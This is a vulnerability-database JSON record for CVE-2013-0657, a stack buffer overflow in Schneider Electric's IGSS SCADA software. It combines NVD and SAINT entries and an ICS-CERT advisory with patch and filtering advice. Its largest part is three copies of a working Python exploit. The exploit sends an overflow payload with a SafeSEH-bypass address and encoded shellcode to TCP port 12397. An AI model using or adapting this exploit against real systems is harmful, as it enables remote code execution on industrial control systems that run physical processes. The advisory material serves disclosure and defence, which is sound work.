{"cve": [{"lastseen": "2020-12-09T19:52:37", "description": "Stack-based buffer overflow in Schneider Electric Interactive Graphical SCADA System (IGSS) 10 and earlier allows remote attackers to execute arbitrary code by sending TCP port-12397 data that does not comply with a protocol.", "edition": 5, "cvss3": {}, "published": "2013-01-21T16:55:00", "title": "CVE-2013-0657", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0657"], "modified": "2018-08-21T10:29:00", "cpe": ["cpe:/a:schneider-electric:interactive_graphical_scada_system:10.0", "cpe:/a:schneider-electric:interactive_graphical_scada_system:9.0"], "id": "CVE-2013-0657", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0657", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:schneider-electric:interactive_graphical_scada_system:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:schneider-electric:interactive_graphical_scada_system:9.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "description": "Added: 02/11/2013 \nCVE: [CVE-2013-0657](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657>) \nBID: [57449](<http://www.securityfocus.com/bid/57449>) \nOSVDB: [89324](<http://www.osvdb.org/89324>) \n\n\n### Background\n\n[Schneider Electric Interactive Graphical SCADA System (IGSS)](<http://igss.schneider-electric.com/products/IGSS-Legacy/what-is-igss.aspx>) is a supervisory control and 
data acquisition (SCADA) system designed to monitor and control industrial processes. The Data Collector (`DC.exe`) component listens on port 12397/tcp. \n\n### Problem\n\nA buffer overflow vulnerability in the `DC.exe` executable allows remote arbitrary code execution when a malicious user sends a specially crafted request to port 12397/tcp. \n\n### Resolution\n\nSchneider Electric has released software updates for [IGSS v9](<http://igss.schneider-electric.com/igss/igssupdates/v90/progupdatesv90.zip>) and [IGSS v10](<http://igss.schneider-electric.com/igss/igssupdates/v100/progupdatesv100.zip>). \n\n### References\n\n<http://ics-cert.us-cert.gov/pdf/ICSA-13-018-01.pdf> \n<http://www2.schneider-electric.com/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130110_advisory_of_vulnerability_affecting_igss_scada_software.xml> \n\n\n### Limitations\n\nThis exploit was tested against Schneider Electric Interactive Graphical SCADA System 9.0 on Microsoft Windows Server 2003 SP2 English with DEP OptOut. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-02-11T00:00:00", "published": "2013-02-11T00:00:00", "id": "SAINT:A8F8A1ECEDDA3AB332EA90D0C7A29537", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/schneider_electric_igss_dcexe_overflow", "type": "saint", "title": "Schneider Electric Interactive Graphical SCADA System Data Collector Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "edition": 2, "description": "Added: 02/11/2013 \nCVE: [CVE-2013-0657](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657>) \nBID: [57449](<http://www.securityfocus.com/bid/57449>) \nOSVDB: [89324](<http://www.osvdb.org/89324>) \n\n\n### Background\n\n[Schneider Electric Interactive Graphical SCADA System (IGSS)](<http://igss.schneider-electric.com/products/IGSS-Legacy/what-is-igss.aspx>) is a supervisory control and data acquisition (SCADA) system designed to monitor and control industrial processes. The Data Collector (`DC.exe`) component listens on port 12397/tcp. \n\n### Problem\n\nA buffer overflow vulnerability in the `DC.exe` executable allows remote arbitrary code execution when a malicious user sends a specially crafted request to port 12397/tcp. \n\n### Resolution\n\nSchneider Electric has released software updates for [IGSS v9](<http://igss.schneider-electric.com/igss/igssupdates/v90/progupdatesv90.zip>) and [IGSS v10](<http://igss.schneider-electric.com/igss/igssupdates/v100/progupdatesv100.zip>). 
\n\n### References\n\n<http://ics-cert.us-cert.gov/pdf/ICSA-13-018-01.pdf> \n<http://www2.schneider-electric.com/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130110_advisory_of_vulnerability_affecting_igss_scada_software.xml> \n\n\n### Limitations\n\nThis exploit was tested against Schneider Electric Interactive Graphical SCADA System 9.0 on Microsoft Windows Server 2003 SP2 English with DEP OptOut. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-02-11T00:00:00", "published": "2013-02-11T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/schneider_electric_igss_dcexe_overflow", "id": "SAINT:D90D8BFD364F40BDFF1DDF059B92120F", "type": "saint", "title": "Schneider Electric Interactive Graphical SCADA System Data Collector Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "description": "Added: 02/11/2013 \nCVE: [CVE-2013-0657](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657>) \nBID: [57449](<http://www.securityfocus.com/bid/57449>) \nOSVDB: [89324](<http://www.osvdb.org/89324>) \n\n\n### Background\n\n[Schneider Electric Interactive Graphical SCADA System (IGSS)](<http://igss.schneider-electric.com/products/IGSS-Legacy/what-is-igss.aspx>) is a supervisory control and data acquisition (SCADA) system designed to monitor and control industrial processes. The Data Collector (`DC.exe`) component listens on port 12397/tcp. \n\n### Problem\n\nA buffer overflow vulnerability in the `DC.exe` executable allows remote arbitrary code execution when a malicious user sends a specially crafted request to port 12397/tcp. 
\n\n### Resolution\n\nSchneider Electric has released software updates for [IGSS v9](<http://igss.schneider-electric.com/igss/igssupdates/v90/progupdatesv90.zip>) and [IGSS v10](<http://igss.schneider-electric.com/igss/igssupdates/v100/progupdatesv100.zip>). \n\n### References\n\n<http://ics-cert.us-cert.gov/pdf/ICSA-13-018-01.pdf> \n<http://www2.schneider-electric.com/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130110_advisory_of_vulnerability_affecting_igss_scada_software.xml> \n\n\n### Limitations\n\nThis exploit was tested against Schneider Electric Interactive Graphical SCADA System 9.0 on Microsoft Windows Server 2003 SP2 English with DEP OptOut. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-02-11T00:00:00", "published": "2013-02-11T00:00:00", "id": "SAINT:8C3F6FF0B19656C4E22DA0D1FFAF66EB", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/schneider_electric_igss_dcexe_overflow", "title": "Schneider Electric Interactive Graphical SCADA System Data Collector Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-08-20T11:44:52", "description": "SEIG SCADA System 9 - Remote Code Execution. CVE-2013-0657. 
Remote exploit for Windows_x86 platform", "published": "2018-08-19T00:00:00", "type": "exploitdb", "title": "SEIG SCADA System 9 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "modified": "2018-08-19T00:00:00", "id": "EDB-ID:45218", "href": "https://www.exploit-db.com/exploits/45218/", "sourceData": "# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution\r\n# Author: Alejandro Parodi\r\n# Date: 2018-08-17\r\n# Vendor Homepage: https://www.schneider-electric.com\r\n# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/\r\n# Version: v9\r\n# Tested on: Windows7 x86\r\n# CVE: CVE-2013-0657\r\n# References: \r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657\r\n\r\nimport socket\r\nimport struct\r\n\r\nip = \"192.168.0.23\"\r\nport = 12397\r\ncon = (ip, port)\r\n\r\n# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)\r\n# length = \"\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n# message = \"\\x00\\x70AA\\x65\\x00\\x00\\x00AAAAAAAAAAAAAAAA\\x00\\x00\\x00\\x00\"+\"B\"*28644\r\n# payload = length+message\r\n\r\n# Exploit Magic\r\nmessage_header = struct.pack(\"<L\", 0x6014) + \"\\x66\\x66\\x07\\x00\"\r\nmessage_protocol_data = \"\\x10\\x00\\x00\\x00\" + \"\\x19\" + \"\\x00\\x00\\x00\\x00\\x00\" + \"\\x04\" + \"\\x00\\x00\\x00\" + struct.pack(\">H\", 0x6000)\r\npadding = \"B\" * 3344\r\neip_safeseh_bypass_address = struct.pack(\"<L\", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)\r\n\r\n# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\\x00\\xFF\\x0A\\x0D' -f python\r\n# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources\r\nnopsleed = \"\\x41\"*100 # \\x90 bad char bypass\r\nshellcode = \"\\xda\\xcb\\xbd\\x0f\\x83\\x69\\x70\\xd9\\x74\\x24\\xf4\\x58\\x31\"\r\nshellcode += 
\"\\xc9\\xb1\\x4b\\x83\\xe8\\xfc\\x31\\x68\\x14\\x03\\x68\\x1b\\x61\"\r\nshellcode += \"\\x9c\\xa9\\xcf\\xd8\\x3a\\xb3\\x6e\\xfc\\x1c\\x37\\x54\\xf6\\xc7\"\r\nshellcode += \"\\x93\\x5d\\x47\\xb3\\xd2\\x35\\xb1\\x3f\\x7d\\xdc\\x42\\xd7\\x81\"\r\nshellcode += \"\\x59\\x48\\x93\\x7b\\x98\\x70\\x2a\\x6b\\x98\\x14\\xea\\xc5\\x54\"\r\nshellcode += \"\\x17\\x7c\\x8d\\x25\\x69\\x60\\x27\\x1e\\xc7\\x8a\\x6a\\xd8\\xcf\"\r\nshellcode += \"\\xb6\\xc3\\x9d\\x5a\\x83\\xd6\\xea\\x88\\x14\\x7d\\x5a\\x55\\x71\"\r\nshellcode += \"\\x90\\x85\\xb8\\x37\\x9e\\x3e\\xd7\\x1a\\x76\\xf8\\xb1\\xb9\\x63\"\r\nshellcode += \"\\xb7\\xef\\xa3\\xa6\\xc0\\xb8\\x12\\xb4\\x18\\x62\\x1a\\xe1\\x9e\"\r\nshellcode += \"\\x6f\\x7e\\xa2\\x86\\x6c\\xf7\\x3a\\x31\\xbd\\x55\\x42\\x10\\xad\"\r\nshellcode += \"\\x89\\x16\\xa0\\xb8\\x6a\\xd6\\x4c\\x20\\xd9\\xad\\x81\\x58\\x77\"\r\nshellcode += \"\\x0b\\xa3\\xaa\\xba\\x2c\\x49\\xf0\\x26\\xaa\\xab\\xce\\x5a\\xc3\"\r\nshellcode += \"\\x41\\x69\\x60\\xc4\\x58\\x71\\x71\\x9c\\x3f\\xbe\\xc2\\xbc\\x49\"\r\nshellcode += \"\\xdd\\xab\\x89\\xf0\\x46\\xcb\\x1a\\x8a\\xf1\\xdb\\xe5\\x54\\x1f\"\r\nshellcode += \"\\xfb\\x30\\x3b\\xb1\\x17\\x97\\xb2\\x3e\\x31\\xf8\\x26\\x13\\x9c\"\r\nshellcode += \"\\x16\\xdd\\x26\\x7a\\xe3\\x9b\\x6e\\x29\\x77\\x49\\xc7\\x97\\x98\"\r\nshellcode += \"\\x39\\x7b\\x5f\\xcd\\xeb\\x4a\\x39\\x6e\\x66\\x04\\xbc\\x6c\\xa6\"\r\nshellcode += \"\\x87\\x01\\x63\\x4d\\xf3\\x35\\xc9\\x74\\x35\\xdf\\xe7\\x1f\\x0c\"\r\nshellcode += \"\\xd0\\x69\\x80\\x8c\\x5c\\xde\\x63\\xfc\\x19\\x1b\\x8e\\x24\\x3b\"\r\nshellcode += \"\\x7e\\x01\\x97\\x6f\\x67\\x8f\\x07\\x3f\\x32\\x13\\x23\\x80\\x7e\"\r\nshellcode += \"\\x9a\\x01\\x5a\\xc0\\x3c\\xf9\\xf5\\x5a\\x04\\xb0\\x54\\x46\\x0c\"\r\nshellcode += \"\\xfb\\x21\\x4d\\xd7\\xe0\\xb4\\x02\\xe5\\x4c\\x04\\x5a\\x5e\\x37\"\r\nshellcode += \"\\xd1\\x61\\x6d\\xe1\\x4d\\xe8\\xa8\\xdf\\x26\\xdb\\x55\\x5a\\x60\"\r\nshellcode += \"\\x85\\x68\\x05\\x6a\\x21\\x73\\xdf\\x73\\xa4\\xef\\x26\\x02\\x7e\"\r\nshellcode += 
\"\\xb0\\xb1\\xa6\\xb1\\xac\\x15\\x0f\\x80\\x34\\xae\\xe4\\x8a\"\r\n\r\nJUNK = \"JUNK\"*5202 # 20808 Bytes of JUNK\r\n\r\npayload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK\r\nprint \"Payload length: \"+str(len(payload))\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(con)\r\ns.send(payload)\r\ns.recv(10)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45218/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nSEIG SCADA System 9 - Remote Code Execution", "edition": 1, "published": "2018-08-19T00:00:00", "title": "SEIG SCADA System 9 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "modified": "2018-08-19T00:00:00", "id": "EXPLOITPACK:5C1186B7A96936A722DD16BBE452BD6B", "href": "", "sourceData": "# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution\n# Author: Alejandro Parodi\n# Date: 2018-08-17\n# Vendor Homepage: https://www.schneider-electric.com\n# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/\n# Version: v9\n# Tested on: Windows7 x86\n# CVE: CVE-2013-0657\n# References: \n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657\n\nimport socket\nimport struct\n\nip = \"192.168.0.23\"\nport = 12397\ncon = (ip, port)\n\n# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)\n# length = \"\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\"\n# message = \"\\x00\\x70AA\\x65\\x00\\x00\\x00AAAAAAAAAAAAAAAA\\x00\\x00\\x00\\x00\"+\"B\"*28644\n# payload = length+message\n\n# Exploit Magic\nmessage_header = struct.pack(\"<L\", 0x6014) + \"\\x66\\x66\\x07\\x00\"\nmessage_protocol_data = \"\\x10\\x00\\x00\\x00\" + \"\\x19\" + \"\\x00\\x00\\x00\\x00\\x00\" + \"\\x04\" + \"\\x00\\x00\\x00\" + struct.pack(\">H\", 
0x6000)\npadding = \"B\" * 3344\neip_safeseh_bypass_address = struct.pack(\"<L\", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)\n\n# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\\x00\\xFF\\x0A\\x0D' -f python\n# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources\nnopsleed = \"\\x41\"*100 # \\x90 bad char bypass\nshellcode = \"\\xda\\xcb\\xbd\\x0f\\x83\\x69\\x70\\xd9\\x74\\x24\\xf4\\x58\\x31\"\nshellcode += \"\\xc9\\xb1\\x4b\\x83\\xe8\\xfc\\x31\\x68\\x14\\x03\\x68\\x1b\\x61\"\nshellcode += \"\\x9c\\xa9\\xcf\\xd8\\x3a\\xb3\\x6e\\xfc\\x1c\\x37\\x54\\xf6\\xc7\"\nshellcode += \"\\x93\\x5d\\x47\\xb3\\xd2\\x35\\xb1\\x3f\\x7d\\xdc\\x42\\xd7\\x81\"\nshellcode += \"\\x59\\x48\\x93\\x7b\\x98\\x70\\x2a\\x6b\\x98\\x14\\xea\\xc5\\x54\"\nshellcode += \"\\x17\\x7c\\x8d\\x25\\x69\\x60\\x27\\x1e\\xc7\\x8a\\x6a\\xd8\\xcf\"\nshellcode += \"\\xb6\\xc3\\x9d\\x5a\\x83\\xd6\\xea\\x88\\x14\\x7d\\x5a\\x55\\x71\"\nshellcode += \"\\x90\\x85\\xb8\\x37\\x9e\\x3e\\xd7\\x1a\\x76\\xf8\\xb1\\xb9\\x63\"\nshellcode += \"\\xb7\\xef\\xa3\\xa6\\xc0\\xb8\\x12\\xb4\\x18\\x62\\x1a\\xe1\\x9e\"\nshellcode += \"\\x6f\\x7e\\xa2\\x86\\x6c\\xf7\\x3a\\x31\\xbd\\x55\\x42\\x10\\xad\"\nshellcode += \"\\x89\\x16\\xa0\\xb8\\x6a\\xd6\\x4c\\x20\\xd9\\xad\\x81\\x58\\x77\"\nshellcode += \"\\x0b\\xa3\\xaa\\xba\\x2c\\x49\\xf0\\x26\\xaa\\xab\\xce\\x5a\\xc3\"\nshellcode += \"\\x41\\x69\\x60\\xc4\\x58\\x71\\x71\\x9c\\x3f\\xbe\\xc2\\xbc\\x49\"\nshellcode += \"\\xdd\\xab\\x89\\xf0\\x46\\xcb\\x1a\\x8a\\xf1\\xdb\\xe5\\x54\\x1f\"\nshellcode += \"\\xfb\\x30\\x3b\\xb1\\x17\\x97\\xb2\\x3e\\x31\\xf8\\x26\\x13\\x9c\"\nshellcode += \"\\x16\\xdd\\x26\\x7a\\xe3\\x9b\\x6e\\x29\\x77\\x49\\xc7\\x97\\x98\"\nshellcode += \"\\x39\\x7b\\x5f\\xcd\\xeb\\x4a\\x39\\x6e\\x66\\x04\\xbc\\x6c\\xa6\"\nshellcode += \"\\x87\\x01\\x63\\x4d\\xf3\\x35\\xc9\\x74\\x35\\xdf\\xe7\\x1f\\x0c\"\nshellcode += 
\"\\xd0\\x69\\x80\\x8c\\x5c\\xde\\x63\\xfc\\x19\\x1b\\x8e\\x24\\x3b\"\nshellcode += \"\\x7e\\x01\\x97\\x6f\\x67\\x8f\\x07\\x3f\\x32\\x13\\x23\\x80\\x7e\"\nshellcode += \"\\x9a\\x01\\x5a\\xc0\\x3c\\xf9\\xf5\\x5a\\x04\\xb0\\x54\\x46\\x0c\"\nshellcode += \"\\xfb\\x21\\x4d\\xd7\\xe0\\xb4\\x02\\xe5\\x4c\\x04\\x5a\\x5e\\x37\"\nshellcode += \"\\xd1\\x61\\x6d\\xe1\\x4d\\xe8\\xa8\\xdf\\x26\\xdb\\x55\\x5a\\x60\"\nshellcode += \"\\x85\\x68\\x05\\x6a\\x21\\x73\\xdf\\x73\\xa4\\xef\\x26\\x02\\x7e\"\nshellcode += \"\\xb0\\xb1\\xa6\\xb1\\xac\\x15\\x0f\\x80\\x34\\xae\\xe4\\x8a\"\n\nJUNK = \"JUNK\"*5202 # 20808 Bytes of JUNK\n\npayload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK\nprint \"Payload length: \"+str(len(payload))\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(con)\ns.send(payload)\ns.recv(10)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-08-21T00:27:48", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2018-08-20T00:00:00", "title": "SEIG SCADA System 9 - Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "modified": "2018-08-20T00:00:00", "id": "1337DAY-ID-30925", "href": "https://0day.today/exploit/description/30925", "sourceData": "# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution\r\n# Author: Alejandro Parodi\r\n# Vendor Homepage: https://www.schneider-electric.com\r\n# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/\r\n# Version: v9\r\n# Tested on: Windows7 x86\r\n# CVE: CVE-2013-0657\r\n# References: \r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657\r\n \r\nimport socket\r\nimport struct\r\n \r\nip = \"192.168.0.23\"\r\nport = 12397\r\ncon = (ip, port)\r\n \r\n# DoS Payload found in the research (CRUNCHBASE UNEXPECTED 
PARAMETER)\r\n# length = \"\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n# message = \"\\x00\\x70AA\\x65\\x00\\x00\\x00AAAAAAAAAAAAAAAA\\x00\\x00\\x00\\x00\"+\"B\"*28644\r\n# payload = length+message\r\n \r\n# Exploit Magic\r\nmessage_header = struct.pack(\"<L\", 0x6014) + \"\\x66\\x66\\x07\\x00\"\r\nmessage_protocol_data = \"\\x10\\x00\\x00\\x00\" + \"\\x19\" + \"\\x00\\x00\\x00\\x00\\x00\" + \"\\x04\" + \"\\x00\\x00\\x00\" + struct.pack(\">H\", 0x6000)\r\npadding = \"B\" * 3344\r\neip_safeseh_bypass_address = struct.pack(\"<L\", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)\r\n \r\n# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\\x00\\xFF\\x0A\\x0D' -f python\r\n# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources\r\nnopsleed = \"\\x41\"*100 # \\x90 bad char bypass\r\nshellcode = \"\\xda\\xcb\\xbd\\x0f\\x83\\x69\\x70\\xd9\\x74\\x24\\xf4\\x58\\x31\"\r\nshellcode += \"\\xc9\\xb1\\x4b\\x83\\xe8\\xfc\\x31\\x68\\x14\\x03\\x68\\x1b\\x61\"\r\nshellcode += \"\\x9c\\xa9\\xcf\\xd8\\x3a\\xb3\\x6e\\xfc\\x1c\\x37\\x54\\xf6\\xc7\"\r\nshellcode += \"\\x93\\x5d\\x47\\xb3\\xd2\\x35\\xb1\\x3f\\x7d\\xdc\\x42\\xd7\\x81\"\r\nshellcode += \"\\x59\\x48\\x93\\x7b\\x98\\x70\\x2a\\x6b\\x98\\x14\\xea\\xc5\\x54\"\r\nshellcode += \"\\x17\\x7c\\x8d\\x25\\x69\\x60\\x27\\x1e\\xc7\\x8a\\x6a\\xd8\\xcf\"\r\nshellcode += \"\\xb6\\xc3\\x9d\\x5a\\x83\\xd6\\xea\\x88\\x14\\x7d\\x5a\\x55\\x71\"\r\nshellcode += \"\\x90\\x85\\xb8\\x37\\x9e\\x3e\\xd7\\x1a\\x76\\xf8\\xb1\\xb9\\x63\"\r\nshellcode += \"\\xb7\\xef\\xa3\\xa6\\xc0\\xb8\\x12\\xb4\\x18\\x62\\x1a\\xe1\\x9e\"\r\nshellcode += \"\\x6f\\x7e\\xa2\\x86\\x6c\\xf7\\x3a\\x31\\xbd\\x55\\x42\\x10\\xad\"\r\nshellcode += \"\\x89\\x16\\xa0\\xb8\\x6a\\xd6\\x4c\\x20\\xd9\\xad\\x81\\x58\\x77\"\r\nshellcode += \"\\x0b\\xa3\\xaa\\xba\\x2c\\x49\\xf0\\x26\\xaa\\xab\\xce\\x5a\\xc3\"\r\nshellcode += 
\"\\x41\\x69\\x60\\xc4\\x58\\x71\\x71\\x9c\\x3f\\xbe\\xc2\\xbc\\x49\"\r\nshellcode += \"\\xdd\\xab\\x89\\xf0\\x46\\xcb\\x1a\\x8a\\xf1\\xdb\\xe5\\x54\\x1f\"\r\nshellcode += \"\\xfb\\x30\\x3b\\xb1\\x17\\x97\\xb2\\x3e\\x31\\xf8\\x26\\x13\\x9c\"\r\nshellcode += \"\\x16\\xdd\\x26\\x7a\\xe3\\x9b\\x6e\\x29\\x77\\x49\\xc7\\x97\\x98\"\r\nshellcode += \"\\x39\\x7b\\x5f\\xcd\\xeb\\x4a\\x39\\x6e\\x66\\x04\\xbc\\x6c\\xa6\"\r\nshellcode += \"\\x87\\x01\\x63\\x4d\\xf3\\x35\\xc9\\x74\\x35\\xdf\\xe7\\x1f\\x0c\"\r\nshellcode += \"\\xd0\\x69\\x80\\x8c\\x5c\\xde\\x63\\xfc\\x19\\x1b\\x8e\\x24\\x3b\"\r\nshellcode += \"\\x7e\\x01\\x97\\x6f\\x67\\x8f\\x07\\x3f\\x32\\x13\\x23\\x80\\x7e\"\r\nshellcode += \"\\x9a\\x01\\x5a\\xc0\\x3c\\xf9\\xf5\\x5a\\x04\\xb0\\x54\\x46\\x0c\"\r\nshellcode += \"\\xfb\\x21\\x4d\\xd7\\xe0\\xb4\\x02\\xe5\\x4c\\x04\\x5a\\x5e\\x37\"\r\nshellcode += \"\\xd1\\x61\\x6d\\xe1\\x4d\\xe8\\xa8\\xdf\\x26\\xdb\\x55\\x5a\\x60\"\r\nshellcode += \"\\x85\\x68\\x05\\x6a\\x21\\x73\\xdf\\x73\\xa4\\xef\\x26\\x02\\x7e\"\r\nshellcode += \"\\xb0\\xb1\\xa6\\xb1\\xac\\x15\\x0f\\x80\\x34\\xae\\xe4\\x8a\"\r\n \r\nJUNK = \"JUNK\"*5202 # 20808 Bytes of JUNK\r\n \r\npayload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK\r\nprint \"Payload length: \"+str(len(payload))\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(con)\r\ns.send(payload)\r\ns.recv(10)\n\n# 0day.today [2018-08-20] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30925"}], "ics": [{"lastseen": "2020-12-18T03:22:41", "bulletinFamily": "info", "cvelist": ["CVE-2013-0657"], "description": "## Overview\n\nIndependent researcher Aaron Portnoy of Exodus Intelligence has identified a buffer overflow vulnerability in Schneider Electric\u2019s Interactive Graphical SCADA System (IGSS) application. 
Schneider Electric has produced a patch that fully resolves this vulnerability. Aaron Portnoy has validated this patch. This vulnerability could be exploited remotely.\n\n## Affected Products\n\nThe following Schneider Electric products are affected:\n\n * IGSS application, all versions.\n\n## Impact\n\nAn exploit of this vulnerability could result in a buffer overflow that could possibly allow an attacker to execute code under administrator credentials. IGSS is employed in many sectors including renewable energy, process control, monitoring and control, motor controls, lighting controls, electrical distribution, and security systems.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## Background\n\nSchneider Electric is a US-based company that maintains offices in 190 countries worldwide. Their products address various markets including renewable energy, process control, monitoring and control, motor controls, lighting controls, electrical distribution, and security systems.\n\nIGSS is a desktop application that is used to integrate industrial control system (ICS) components from diverse vendors using diverse sets of protocols, and to integrate their configuration and monitoring functions using IGSS as a single supervisory or human-machine interface (HMI) system. This software is employed worldwide in a broad range of application areas outside those market areas listed above.\n\n## Vulnerability Characterization\n\n### Vulnerability Overview\n\nVulnerabilities are classified using the [Common Weakness Enumeration (CWE)](<http://cwe.mitre.org/data/>). 
This stack-based buffer overflow is classified as CWE-121.\n\n#### Stack-Based Buffer Overflow [1]\n\nIGSS communicates with a broad range of ICS devices using a broad range of protocols over two network ports, 12397/TCP and 12399/TCP by default. It has been found that out-of-protocol communication over Port 12397/TCP can cause a buffer overflow condition. Although this overflow can cause the application to crash, an attacker can also apply techniques to take advantage of the buffer overflow and likely execute malicious code with administrator privileges.\n\n[CVE-2013-0657](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0657>) has been assigned to this vulnerability. A CVSS v2 base score of 10.0 has been assigned; the CVSS vector string is [(AV:N/AC:L/Au:N/C:C/I:C/A:C)](<http://nvd.nist.gov/cvss.cfm?name=&vector=%28AV:N/AC:L/Au:N/C:C/I:C/A:C%29&version=2>).\n\n### Vulnerability Details\n\n#### Exploitability\n\nThis vulnerability can be exploited remotely.\n\n#### Existence of Exploit\n\nNo known public exploits specifically target this vulnerability.\n\n#### Difficulty\n\nAn attacker with moderate skill would be able to exploit this vulnerability.\n\n## Mitigation\n\nThe best mitigation for this vulnerability is applying the appropriate vendor-supplied patch listed below.\n\nIf this vulnerability is not mitigated, a remote attacker could cause a buffer overflow and allow malicious code to be executed with administrator privileges.\n\nSchneider Electric has issued two patches, for versions [V9](<http://igss.schneider-electric.com/igss/igssupdates/v90/progupdatesv90.zip>) and [V10](<http://igss.schneider-electric.com/igss/igssupdates/v100/progupdatesv100.zip>) of the IGSS software, to address this vulnerability. These patches are available from the Schneider Electric Web site or directly from the links in this advisory. 
Aaron Portnoy of Exodus Intelligence has validated the patches.\n\nUsers of older versions of this software should upgrade their software or employ other mitigation methods. At a minimum, port 12397/TCP should be filtered to only allow access from the specific IP addresses of the devices being controlled or monitored. The general measures listed below can also be employed to help mitigate this vulnerability.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices. Critical devices should not directly face the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private 